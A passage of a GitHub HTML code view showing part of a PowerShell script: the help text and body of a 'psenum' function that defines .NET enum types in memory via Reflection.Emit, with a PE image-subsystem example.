class=\"blob-num js-line-number\" data-line-number=\"373\"></td>\n        <td id=\"LC373\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Module</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L374\" class=\"blob-num js-line-number\" data-line-number=\"374\"></td>\n        <td id=\"LC374\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L375\" class=\"blob-num js-line-number\" data-line-number=\"375\"></td>\n        <td id=\"LC375\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The in-memory module that will host the enum. Use</span></td>\n      </tr>\n      <tr>\n        <td id=\"L376\" class=\"blob-num js-line-number\" data-line-number=\"376\"></td>\n        <td id=\"LC376\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    New-InMemoryModule to define an in-memory module.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L377\" class=\"blob-num js-line-number\" data-line-number=\"377\"></td>\n        <td id=\"LC377\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L378\" class=\"blob-num js-line-number\" data-line-number=\"378\"></td>\n        <td id=\"LC378\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">FullName</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L379\" class=\"blob-num js-line-number\" data-line-number=\"379\"></td>\n        <td id=\"LC379\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L380\" class=\"blob-num js-line-number\" data-line-number=\"380\"></td>\n        <td id=\"LC380\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The fully-qualified name of the enum.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L381\" class=\"blob-num js-line-number\" data-line-number=\"381\"></td>\n        <td id=\"LC381\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L382\" class=\"blob-num js-line-number\" data-line-number=\"382\"></td>\n        <td id=\"LC382\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Type</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L383\" class=\"blob-num js-line-number\" data-line-number=\"383\"></td>\n        <td id=\"LC383\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L384\" class=\"blob-num js-line-number\" data-line-number=\"384\"></td>\n        <td id=\"LC384\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    The type of each enum element.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L385\" class=\"blob-num js-line-number\" data-line-number=\"385\"></td>\n        <td id=\"LC385\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L386\" class=\"blob-num js-line-number\" data-line-number=\"386\"></td>\n        <td id=\"LC386\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">EnumElements</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L387\" class=\"blob-num js-line-number\" data-line-number=\"387\"></td>\n        <td id=\"LC387\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L388\" class=\"blob-num js-line-number\" data-line-number=\"388\"></td>\n        <td id=\"LC388\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    A hashtable of enum elements.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L389\" class=\"blob-num js-line-number\" data-line-number=\"389\"></td>\n        <td id=\"LC389\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L390\" class=\"blob-num js-line-number\" data-line-number=\"390\"></td>\n        <td id=\"LC390\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Bitfield</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L391\" class=\"blob-num js-line-number\" data-line-number=\"391\"></td>\n        <td id=\"LC391\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L392\" class=\"blob-num js-line-number\" data-line-number=\"392\"></td>\n        <td id=\"LC392\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Specifies that the enum should be treated as a bitfield.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L393\" class=\"blob-num js-line-number\" data-line-number=\"393\"></td>\n        <td id=\"LC393\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L394\" class=\"blob-num js-line-number\" data-line-number=\"394\"></td>\n        <td id=\"LC394\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">EXAMPLE</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L395\" class=\"blob-num js-line-number\" data-line-number=\"395\"></td>\n        <td id=\"LC395\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L396\" class=\"blob-num js-line-number\" data-line-number=\"396\"></td>\n        <td id=\"LC396\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Mod = New-InMemoryModule -ModuleName Win32</span></td>\n      </tr>\n      <tr>\n        <td id=\"L397\" class=\"blob-num js-line-number\" data-line-number=\"397\"></td>\n        <td id=\"LC397\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L398\" class=\"blob-num js-line-number\" data-line-number=\"398\"></td>\n        <td id=\"LC398\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{</span></td>\n      </tr>\n      <tr>\n        <td id=\"L399\" class=\"blob-num js-line-number\" data-line-number=\"399\"></td>\n        <td id=\"LC399\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        UNKNOWN =                  0</span></td>\n      </tr>\n      <tr>\n        <td id=\"L400\" class=\"blob-num js-line-number\" data-line-number=\"400\"></td>\n        <td id=\"LC400\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        NATIVE =                   1 # Image doesn&#39;t require a subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L401\" class=\"blob-num js-line-number\" data-line-number=\"401\"></td>\n        <td id=\"LC401\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L402\" class=\"blob-num js-line-number\" data-line-number=\"402\"></td>\n        <td id=\"LC402\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L403\" class=\"blob-num js-line-number\" data-line-number=\"403\"></td>\n        <td id=\"LC403\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L404\" class=\"blob-num js-line-number\" data-line-number=\"404\"></td>\n        <td id=\"LC404\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        POSIX_CUI =                7 # Image runs in the Posix character subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L405\" class=\"blob-num js-line-number\" data-line-number=\"405\"></td>\n        <td id=\"LC405\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        NATIVE_WINDOWS =           8 # Image is a native Win9x driver.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L406\" class=\"blob-num js-line-number\" data-line-number=\"406\"></td>\n        <td id=\"LC406\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L407\" class=\"blob-num js-line-number\" data-line-number=\"407\"></td>\n        <td id=\"LC407\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        EFI_APPLICATION =          10</span></td>\n      </tr>\n      <tr>\n        <td id=\"L408\" class=\"blob-num js-line-number\" data-line-number=\"408\"></td>\n        <td id=\"LC408\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        EFI_BOOT_SERVICE_DRIVER =  11</span></td>\n      </tr>\n      <tr>\n        <td id=\"L409\" class=\"blob-num js-line-number\" data-line-number=\"409\"></td>\n        <td id=\"LC409\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        EFI_RUNTIME_DRIVER =       12</span></td>\n      </tr>\n      <tr>\n        <td id=\"L410\" class=\"blob-num js-line-number\" data-line-number=\"410\"></td>\n        <td id=\"LC410\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        EFI_ROM =                  13</span></td>\n      </tr>\n      <tr>\n        <td id=\"L411\" class=\"blob-num js-line-number\" data-line-number=\"411\"></td>\n        <td id=\"LC411\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        XBOX =                     14</span></td>\n      </tr>\n      <tr>\n        <td id=\"L412\" class=\"blob-num js-line-number\" data-line-number=\"412\"></td>\n        <td id=\"LC412\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        WINDOWS_BOOT_APPLICATION = 16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L413\" class=\"blob-num js-line-number\" data-line-number=\"413\"></td>\n        <td id=\"LC413\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    }</span></td>\n      </tr>\n      <tr>\n        <td id=\"L414\" class=\"blob-num js-line-number\" data-line-number=\"414\"></td>\n        <td id=\"LC414\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L415\" class=\"blob-num js-line-number\" data-line-number=\"415\"></td>\n        <td id=\"LC415\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">NOTES</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L416\" class=\"blob-num js-line-number\" data-line-number=\"416\"></td>\n        <td id=\"LC416\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L417\" class=\"blob-num js-line-number\" data-line-number=\"417\"></td>\n        <td id=\"LC417\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    PowerShell purists may disagree with the naming of this function but</span></td>\n      </tr>\n      <tr>\n        <td id=\"L418\" class=\"blob-num js-line-number\" data-line-number=\"418\"></td>\n        <td id=\"LC418\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    again, this was developed in such a way so as to emulate a &quot;C style&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L419\" class=\"blob-num js-line-number\" data-line-number=\"419\"></td>\n        <td id=\"LC419\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    definition as closely as possible. Sorry, I&#39;m not going to name it</span></td>\n      </tr>\n      <tr>\n        <td id=\"L420\" class=\"blob-num js-line-number\" data-line-number=\"420\"></td>\n        <td id=\"LC420\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    New-Enum. :P</span></td>\n      </tr>\n      <tr>\n        <td id=\"L421\" class=\"blob-num js-line-number\" data-line-number=\"421\"></td>\n        <td id=\"LC421\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    #&gt;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L422\" class=\"blob-num js-line-number\" data-line-number=\"422\"></td>\n        <td id=\"LC422\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L423\" class=\"blob-num js-line-number\" data-line-number=\"423\"></td>\n        <td id=\"LC423\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-ent\">[OutputTyp<span class=\"pl-ent\">e</span></span><span class=\"pl-e\">([<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Type</span><span class=\"pl-smi\">]</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L424\" class=\"blob-num js-line-number\" data-line-number=\"424\"></td>\n        <td id=\"LC424\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L425\" class=\"blob-num js-line-number\" data-line-number=\"425\"></td>\n        <td id=\"LC425\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L426\" class=\"blob-num js-line-number\" data-line-number=\"426\"></td>\n        <td id=\"LC426\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 0</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L427\" class=\"blob-num js-line-number\" data-line-number=\"427\"></td>\n        <td id=\"LC427\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateScrip<span class=\"pl-ent\">t</span></span><span class=\"pl-e\">({(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Emit.ModuleBuilder]</span></span></span>)</span> -or <span class=\"pl-e\">(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Assembly]</span></span></span>)</span>})<span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L428\" class=\"blob-num js-line-number\" data-line-number=\"428\"></td>\n        <td id=\"LC428\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L429\" class=\"blob-num js-line-number\" data-line-number=\"429\"></td>\n        <td id=\"LC429\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L430\" class=\"blob-num js-line-number\" data-line-number=\"430\"></td>\n        <td id=\"LC430\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 1</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L431\" class=\"blob-num js-line-number\" data-line-number=\"431\"></td>\n        <td id=\"LC431\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNullOrEmpt<span class=\"pl-ent\">y</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L432\" class=\"blob-num js-line-number\" data-line-number=\"432\"></td>\n        <td id=\"LC432\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L433\" class=\"blob-num js-line-number\" data-line-number=\"433\"></td>\n        <td id=\"LC433\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L434\" class=\"blob-num js-line-number\" data-line-number=\"434\"></td>\n        <td id=\"LC434\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L435\" class=\"blob-num js-line-number\" data-line-number=\"435\"></td>\n        <td id=\"LC435\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 2</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L436\" class=\"blob-num js-line-number\" data-line-number=\"436\"></td>\n        <td id=\"LC436\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L437\" class=\"blob-num js-line-number\" data-line-number=\"437\"></td>\n        <td id=\"LC437\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L438\" class=\"blob-num js-line-number\" data-line-number=\"438\"></td>\n        <td id=\"LC438\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L439\" class=\"blob-num js-line-number\" data-line-number=\"439\"></td>\n        <td id=\"LC439\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 3</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L440\" class=\"blob-num js-line-number\" data-line-number=\"440\"></td>\n        <td id=\"LC440\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNullOrEmpt<span class=\"pl-ent\">y</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L441\" class=\"blob-num js-line-number\" data-line-number=\"441\"></td>\n        <td id=\"LC441\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Hashtable]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L442\" class=\"blob-num js-line-number\" data-line-number=\"442\"></td>\n        <td id=\"LC442\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumElements</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L443\" class=\"blob-num js-line-number\" data-line-number=\"443\"></td>\n        <td id=\"LC443\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L444\" class=\"blob-num js-line-number\" data-line-number=\"444\"></td>\n        <td id=\"LC444\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Switch]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L445\" class=\"blob-num js-line-number\" data-line-number=\"445\"></td>\n        <td id=\"LC445\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Bitfield</span></td>\n      </tr>\n      <tr>\n        <td id=\"L446\" class=\"blob-num js-line-number\" data-line-number=\"446\"></td>\n        <td id=\"LC446\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L447\" class=\"blob-num js-line-number\" data-line-number=\"447\"></td>\n        <td id=\"LC447\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L448\" class=\"blob-num js-line-number\" data-line-number=\"448\"></td>\n        <td id=\"LC448\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span> <span class=\"pl-k\">-is</span> <span class=\"pl-e\">[Reflection.Assembly]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L449\" class=\"blob-num js-line-number\" data-line-number=\"449\"></td>\n        <td id=\"LC449\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L450\" class=\"blob-num js-line-number\" data-line-number=\"450\"></td>\n        <td id=\"LC450\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">return</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.GetType</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L451\" class=\"blob-num js-line-number\" data-line-number=\"451\"></td>\n        <td id=\"LC451\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L452\" class=\"blob-num js-line-number\" data-line-number=\"452\"></td>\n        <td id=\"LC452\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L453\" class=\"blob-num js-line-number\" data-line-number=\"453\"></td>\n        <td id=\"LC453\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumType</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span> <span class=\"pl-k\">-as</span> <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L454\" class=\"blob-num js-line-number\" data-line-number=\"454\"></td>\n        <td id=\"LC454\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L455\" class=\"blob-num js-line-number\" data-line-number=\"455\"></td>\n        <td id=\"LC455\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.DefineEnum</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Public&#39;</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumType</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L456\" class=\"blob-num js-line-number\" data-line-number=\"456\"></td>\n        <td id=\"LC456\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L457\" class=\"blob-num js-line-number\" data-line-number=\"457\"></td>\n        <td id=\"LC457\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Bitfield</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L458\" class=\"blob-num js-line-number\" data-line-number=\"458\"></td>\n        <td id=\"LC458\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L459\" class=\"blob-num js-line-number\" data-line-number=\"459\"></td>\n        <td id=\"LC459\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FlagsConstructor</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[FlagsAttribute]</span>.GetConstructor<span class=\"pl-k\">(</span><span class=\"pl-k\">@()</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L460\" class=\"blob-num js-line-number\" data-line-number=\"460\"></td>\n        <td id=\"LC460\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FlagsCustomAttribute</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Reflection.Emit.CustomAttributeBuilder<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FlagsConstructor</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">@()</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L461\" class=\"blob-num js-line-number\" data-line-number=\"461\"></td>\n        <td id=\"LC461\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumBuilder</span><span class=\"pl-en\">.SetCustomAttribute</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FlagsCustomAttribute</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L462\" class=\"blob-num js-line-number\" data-line-number=\"462\"></td>\n        <td id=\"LC462\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L463\" class=\"blob-num js-line-number\" data-line-number=\"463\"></td>\n        <td id=\"LC463\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L464\" class=\"blob-num js-line-number\" data-line-number=\"464\"></td>\n        <td id=\"LC464\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">foreach</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumElements</span><span class=\"pl-en\">.Keys</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L465\" class=\"blob-num js-line-number\" data-line-number=\"465\"></td>\n        <td id=\"LC465\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L466\" class=\"blob-num js-line-number\" data-line-number=\"466\"></td>\n        <td id=\"LC466\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c\"># Apply the specified enum type to each element</span></td>\n      </tr>\n      <tr>\n        <td id=\"L467\" class=\"blob-num js-line-number\" data-line-number=\"467\"></td>\n        <td id=\"LC467\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-c1\">null</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumBuilder</span><span class=\"pl-en\">.DefineLiteral</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumElements</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Key</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">-as</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumType</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L468\" class=\"blob-num js-line-number\" data-line-number=\"468\"></td>\n        <td id=\"LC468\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L469\" class=\"blob-num js-line-number\" data-line-number=\"469\"></td>\n        <td id=\"LC469\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L470\" class=\"blob-num js-line-number\" data-line-number=\"470\"></td>\n        <td id=\"LC470\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">EnumBuilder</span><span class=\"pl-en\">.CreateType</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L471\" class=\"blob-num js-line-number\" data-line-number=\"471\"></td>\n        <td id=\"LC471\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L472\" class=\"blob-num js-line-number\" data-line-number=\"472\"></td>\n        <td id=\"LC472\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L473\" class=\"blob-num js-line-number\" data-line-number=\"473\"></td>\n        <td id=\"LC473\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L474\" class=\"blob-num js-line-number\" data-line-number=\"474\"></td>\n        <td id=\"LC474\" class=\"blob-code blob-code-inner js-file-line\">  <span 